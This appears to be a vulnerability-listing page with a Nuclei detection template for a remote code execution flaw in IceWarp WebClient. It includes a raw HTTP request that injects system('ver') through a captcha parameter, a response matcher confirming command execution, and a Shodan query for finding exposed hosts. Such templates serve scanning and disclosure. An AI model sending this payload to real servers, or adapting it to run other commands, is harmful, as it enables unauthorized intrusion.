漏洞描述
IceWarp WebClient is susceptible to remote code execution.
icewarp-webclient-rce: IceWarp WebClient - Remote Code Execution
PoC代码[已公开]
id: icewarp-webclient-rce
info:
name: IceWarp WebClient - Remote Code Execution
author: gy741
severity: critical
description: |
IceWarp WebClient is susceptible to remote code execution.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-77
cpe: cpe:2.3:a:icewarp:icewarp:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"icewarp"
product: icewarp
vendor: icewarp
tags: icewarp,rce,vuln
http:
- raw:
- |
POST /webmail/basic/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
_dlg[captcha][target]=system(\'ver\')\
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Microsoft Windows [Version"
- type: status
status:
- 302
# digest: 490a0046304402204389603e3c152b577f8ad301f42c0d9dbb4d9ee972ba27647a5e79f52c1f5a3c02205bbccf5e82f1fa2bcff094fc78bcd39b8d222dee148b2436a160505683706318:922c64590222798bb761d5b6d8e72950